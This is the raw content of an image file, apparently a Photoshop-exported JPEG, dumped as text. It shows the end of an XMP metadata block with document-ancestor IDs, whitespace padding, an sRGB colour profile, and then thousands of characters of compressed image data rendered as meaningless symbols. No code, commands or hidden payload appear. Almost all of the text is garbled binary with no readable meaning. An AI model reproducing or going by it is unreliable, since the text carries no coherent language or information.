<rdf:li>xmp.did:6b6c8a71-1c2a-4226-8a5b-05c8742922ca</rdf:li> <rdf:li>xmp.did:706982fc-7d98-40e8-af5c-34d725b5fae1</rdf:li> <rdf:li>xmp.did:707FC7D22F206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:748206EDA31DE9119725FED0EB7940B5</rdf:li> <rdf:li>xmp.did:76D4B8C310206811943DE82709197D15</rdf:li> <rdf:li>xmp.did:7911307E13206811871FC6751E16770B</rdf:li> <rdf:li>xmp.did:7D1099985A206811871F8776FCDA7166</rdf:li> <rdf:li>xmp.did:7DB3BE00292068118A6D84548B7B40A0</rdf:li> <rdf:li>xmp.did:81A7D5F82A206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:859F05911120681188C6C1527B0156A2</rdf:li> <rdf:li>xmp.did:863A0FC29F3AE811BD0DBED084B8F5A4</rdf:li> <rdf:li>xmp.did:867D40201F20681192B0BD9018AEE708</rdf:li> <rdf:li>xmp.did:8685A3F7322068119109C2E60CCDE007</rdf:li> <rdf:li>xmp.did:885D621F1720681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:9751854B10206811871FFB0658B2D2AF</rdf:li> <rdf:li>xmp.did:C1DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:C4DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:CDEFD3061220681192B0F75C6E6D61CB</rdf:li> <rdf:li>xmp.did:CF33DBC20D20681188C6F5FBAB6EEDBA</rdf:li> <rdf:li>xmp.did:D4B0CF55162068118C14B2857F8C4C6C</rdf:li> <rdf:li>xmp.did:E25EBE490A2068118C14EFCE47AE8D3F</rdf:li> <rdf:li>xmp.did:E71424F945206811A7BADFC90BDD9E59</rdf:li> <rdf:li>xmp.did:EA2E99433520681188C6819A55480162</rdf:li> <rdf:li>xmp.did:ECE9CB841020681192B0AC59354E4128</rdf:li> <rdf:li>xmp.did:F409F9F123206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:F4F6D7D84C20681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:F77F11740720681197CFB2669E13D7A6</rdf:li> <rdf:li>xmp.did:F866F6662B20681188C6CF690D9A65F5</rdf:li> <rdf:li>xmp.did:F8D31357D8A111E492B4A31594B6DD98</rdf:li> <rdf:li>xmp.did:FE7F11740720681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:da422971-04e3-d046-ad90-462cb7d1b2d0</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>ÿâXICC_PROFILEHLinomntrRGB XYZ Î	1acspMSFTIEC sRGBöÖÓ-HP  cprtP3desc„lwtptðbkptrXYZgXYZ,bXYZ@dmndTpdmddĈvuedL†viewÔ$lumiømeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ óQÌXYZ XYZ o¢8õXYZ b™·…ÚXYZ $ „¶ÏdescIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view¤þ_.ÏíÌ\žXYZ L	VPWçmeassig CRT curv
          #(-27;@EJOTY^chmrw|†‹•šŸ¤©®²·¼ÁÆËÐÕÛàåëðöû
          %+28>ELRY`gnu|ƒ‹’š¡©±¹ÁÉÑÙáéòú&/8AKT]gqz„Ž˜¢¬¶ÁËÕàëõ!-8COZfr~Š–¢®ºÇÓàìù -;HUcq~Œš¨¶ÄÓáðþ
          +:IXgw†–¦µÅÕåö'7HYj{Œ¯ÀÑãõ+=Oat†™¬¿Òåø2FZn‚–ª¾Òçû		%	:	O	d	y		¤	º	Ï	å	û
          
          '
          =
          T
          j
          
          ˜
          ®
          Å
          Ü
          ó"9Qi€˜°Èáù*C\uŽ§ÀÙó
          
          
          &
          @
          Z
          t
          Ž
          ©
          Ã
          Þ
          ø.Id›¶Òî	%A^z–³Ïì	&Ca~›¹×õ1OmŒªÉè&Ed„£Ãã#Ccƒ¤Åå'Ij‹­Îð4Vx›½à&Il²ÖúAe‰®Ò÷@eНÕú Ek‘·Ý*QwžÅì;cвÚ*R{£ÌõGp™Ãì@j”¾é>i”¿ê  A l ˜ Ä ð!!H!u!¡!Î!û"'"U"‚"¯"Ý#
          #8#f#”#Â#ð$$M$|$«$Ú%	%8%h%—%Ç%÷&'&W&‡&·&è''I'z'«'Ü(
          (?(q(¢(Ô))8)k))Ð**5*h*›*Ï++6+i++Ñ,,9,n,¢,×--A-v-«-á..L.‚.·.î/$/Z/‘/Ç/þ050l0¤0Û11J1‚1º1ò2*2c2›2Ô3
          3F33¸3ñ4+4e4ž4Ø55M5‡5Â5ý676r6®6é7$7`7œ7×88P8Œ8È99B99¼9ù:6:t:²:ï;-;k;ª;è<'<e<¤<ã="=a=¡=à> >`> >à?!?a?¢?â@#@d@¦@çA)AjA¬AîB0BrBµB÷C:C}CÀDDGDŠDÎEEUEšEÞF"FgF«FðG5G{GÀHHKH‘H×IIcI©IðJ7J}JÄKKSKšKâL*LrLºMMJM“MÜN%NnN·OOIO“OÝP'PqP»QQPQ›QæR1R|RÇSS_SªSöTBTTÛU(UuUÂVV\V©V÷WDW’WàX/X}XËYYiY¸ZZVZ¦Zõ[E[•[å\5\†\Ö]']x]É^^l^½__a_³``W`ª`üaOa¢aõbIbœbðcCc—cëd@d”dée=e’eçf=f’fèg=g“géh?h–hìiCišiñjHjŸj÷kOk§kÿlWl¯mm`m¹nnknÄooxoÑp+p†pàq:q•qðrKr¦ss]s¸ttptÌu(u…uáv>v›vøwVw³xxnxÌy*y‰yçzFz¥{{c{Â|!||á}A}¡~~b~Â#„å€G€¨
          kÍ‚0‚’‚ôƒWƒº„„€„ã…G…«††r†×‡;‡ŸˆˆiˆÎ‰3‰™‰þŠdŠÊ‹0‹–‹üŒcŒÊ1˜ÿŽfŽÎ6žnÖ‘?‘¨’’z’ã“M“¶” ”Š”ô•_•É–4–Ÿ—
          —u—à˜L˜¸™$™™üšhšÕ›B›¯œœ‰œ÷dÒž@ž®ŸŸ‹Ÿú i Ø¡G¡¶¢&¢–££v£æ¤V¤Ç¥8¥©¦¦‹¦ý§n§à¨R¨Ä©7©©ªª««u«é¬\¬Ð­D­¸®-®¡¯¯‹°°u°ê±`±Ö²K²Â³8³®´%´œµµŠ¶¶y¶ð·h·à¸Y¸Ñ¹J¹Âº;ºµ».»§¼!¼›½½¾
          ¾„¾ÿ¿z¿õÀpÀìÁgÁãÂ_ÂÛÃXÃÔÄQÄÎÅKÅÈÆFÆÃÇAÇ¿È=ȼÉ:ɹÊ8Ê·Ë6˶Ì5̵Í5͵Î6ζÏ7ϸÐ9кÑ<ѾÒ?ÒÁÓDÓÆÔIÔËÕNÕÑÖUÖØ×\×àØdØèÙlÙñÚvÚûۀÜ܊ÝݖÞÞ¢ß)߯à6à½áDáÌâSâÛãcãëäsäü儿
          æ–çç©è2è¼éFéÐê[êåëpëûì†ííœî(î´ï@ïÌðXðåñrñÿòŒóó§ô4ôÂõPõÞömöû÷Šøø¨ù8ùÇúWúçûwüü˜ý)ýºþKþÜÿmÿÿÿîAdobed@ÿۄÿÀv°ÿÝ–ÿÄ¢	
          	
          	u!"1A2#	QBa$3Rqb‘%C¡±ð&4r
          ÁÑ5'áS6‚ñ’¢DTsEF7Gc(UVW²ÂÒâòdƒt“„e£³ÃÓã)8fóu*9:HIJXYZghijvwxyz…†‡ˆ‰Š”•–—˜™š¤¥¦§¨©ª´µ¶·¸¹ºÄÅÆÇÈÉÊÔÕÖרÙÚäåæçèéêôõö÷øùúm!1"AQ2aqB#‘R¡b3	±$ÁÑCrðá‚4%’ScDñ¢²&5T6Ed'
          sƒ“FtÂÒâòUeuV7„…£³ÃÓãó)”¤´ÄÔäô•¥µÅÕåõ(GWf8v†–¦¶ÆÖæögw‡—§·Ç×ç÷HXhxˆ˜¨¸ÈØèø9IYiy‰™©¹ÉÙéù*:JZjzŠšªºÊÚêúÿÚ?Ù_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷suW_ÎÔ{Ç~í¬z¨gÆTd¢›,ˆÀ2»â©>ã"ˆàðÆ ãÚëm³p¼­­Ó֘ý¦ƒùõ`¬xƒ¯önþ9ÿÏÏÆç£sõ“Úßêæõÿ(-þô¿ô[ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðô½ÚßÔ{öª:
          ¥Ø;g/‘›ˆqi‘Ž“+=¾¿o‹È
          L„ú:#k~}£¹Ú÷E/qg"§­*?h¨þ}h£+ЩíUëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ê¶¾cüªÊíúž§ë\‹có‘Á÷¿tQÉjÌOÝD²ÅƒÃN¼ÓdššEzŠ•õÀR2²ë1¹o`Žáp¾JÅ^Å<
          ?zŠð|N8½uînTäÓMS4µËQQ<4óÍ#Ë4ÒÈÅä–Y\³É$ŽIf$’MϹ ¥b÷¾½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ê£­õï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uÉãt’7h䍕Ñъº:ÊèÊC++‚9߉Pðë]Z?œ¦cԝ›”—)&BÔ»/td%2d
          j)1mìÍ\„½wÞ*‘IQ!3y­òGãó&ÁFû…Ši¦]G
          *yŽÎ(jđþ%êÑ=:c¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¨õU	IKSU %) š¡Àú”†6‘€úóe÷µ™Tq'¯u¬~=_¹s¹Å–ª2™Ü¥~_!;j&Z̍Tµu/ÍÈYM‡àqîp†QC¤h °
          —pë/”ÍÖGŽÂãr|„«#ÅC‹¢©ÈVJ±#I+GKI³ºÇ–bÙA'vv®§p«êM[ãÃ¥Oú2ìŸù÷›çÿAÁÿÖÿm}M·ü¤Gþô?ÏÖè}^ÿF]“ÿ>ó|ÿè#¸?úßïßSmÿ)ÿ½óõêC׿їdÿϼß?úîþ·û÷ÔÛÊDïCüýz‡Ðõ×ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒ»+þ}ÞúÿÐK?ÿÔýõ6ßò“ûÐÿ?^¡ô={ývWüû½õÿ –ÿ¨=ûêm¿å&?÷¡þ~½Cèz÷ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒ»+þ}ÞúÿÐK?ÿÔýõ6ßò“ûÐÿ?^¡ô={ývWüû½õÿ –ÿ¨=ûêm¿å&?÷¡þ~½Cèz÷ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒ»+þ}ÞúÿÐK?ÿÔýõ6ßò“ûÐÿ?^¡ô={ývWüû½õÿ –ÿ¨=ûêm¿å&?÷¡þ~½Cèz÷ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒû+þ}ÞúÿÐK?ÿÖóïßSmÿ)1ÿ½óõê7ðžºÿF}—ÿ>ë|ÿè'Ÿÿë½ýM¯ü¤Çþô?ÏרßÂz÷ú3ì¿ù÷[çÿA<ÿÿ[ýûêmå&?÷¡þ~½Fþ׿џeÿϺß?ú	çÿúßïßSkÿ)1ÿ½óõê7ðž½þŒû/þ}ÖùÿÐO?ÿÖÿ~ú›_ùIý蟯Q¿„õïôgÙóî·Ïþ‚yÿþ·û÷ÔÚÿÊLïCüýzü'¯£>ËÿŸu¾ôÏÿõ¿ß¾¦×þRcÿzçëÔoá={ýö_üû­óÿ žÿ­þýõ6¿ò“ûÐÿ?^£	ëßèϲÿçÝoŸýóÿýo÷冀ÿ”˜ÿއùúõøO^ÿF}—ÿ>ë|ÿè'Ÿÿë¿}M¯ü¤Çþô?ÏרßÂz÷ú3ì¿ù÷[çÿA<ÿÿ[ýûêmå&?÷¡þ~½Fþ׿џeÿϺß?ú	çÿúßïßSkÿ)1ÿ½óõê7ðž½þŒû/þ}ÖùÿÐO?ÿÖÿ~ú›_ùIý蟯Q¿„õïôgÙóî·Ïþ‚yÿþ·û÷ÔÚÿÊLïCüýzü'¯£>ËÿŸu¾ôÏÿõ¿ß¾¦×þRcÿzçëÔoá={ýö_üû­óÿ žÿ­þýõ6¿ò“ûÐÿ?^£	ëßèϲÿçÝoŸýóÿýo÷冀ÿ”˜ÿއùúõøO^ÿF}—ÿ>ë|ÿè'Ÿÿë¿}M¯ü¤Çþô?ÏרßÂz÷ú3ì¿ù÷[çÿA<ÿÿ[ýûêmå&?÷¡þ~½Fþ׿џeÿϺß?ú	çÿúßïßSkÿ)1ÿ½óõê7ðž½þŒû/þ}ÖùÿÐO?ÿÖÿ~ú›_ùIý蟯Q¿„õïôgÙóî·Ïþ‚yÿþ·û÷ÔÚÿÊLïCüýzü'¯£>ËÿŸu¾ôÏÿõ¿ß¾¦×þRcÿzçëÔoá={ýö_üû­óÿ žÿ­þýõ6¿ò“ûÐÿ?^£	ëßèϲÿçÝoŸýóÿýo÷冀ÿ”˜ÿއùúõøO^ÿF}—ÿ>ë|ÿè'Ÿÿë¿}M¯ü¤Çþô?ÏרßÂz÷ú3ì¿ù÷[çÿA<ÿÿ[ýûêmå&?÷¡þ~½Fþ׿џeÿϺß?ú	çÿúßïßSkÿ)1ÿ½óõê7ðž½þŒû/þ}ÖùÿÐO?ÿÖÿ~ú›_ùIý蟯Q¿„õïôgÙóî·Ïþ‚yÿþ·û÷ÔÚÿÊLïCüýzü'¯£>ËÿŸu¾ôÏÿõ¿ß¾¦×þRcÿzçëÔoá={ýögüû½óÿ –ÿ­þýõ6¿ò“ûÐÿ?^£zºÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½Iœ¶5€«ûî#%…®1$â-AWŽ«0ÈXG7ÛÖEÞ'(@kXmôöê4r
          Q¸eõðu¬Ž#¨ÔÌeuJ‚w¤¯ÇÕS×QUBJËMWI2OMQfHfYOà{xÑՑÅPŠêµÖÍ;S3ýãÚûopè	ü{‡Ìè_ҟÅ1ÔÕÚø/žÞáˆ¼ç‡ø¯ì$tˆŠ:öÏZëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¦¬çüY3ö«Èî$Þ܋ûXÿÓðõîµ÷9jùt¿£ñ‡þgþ 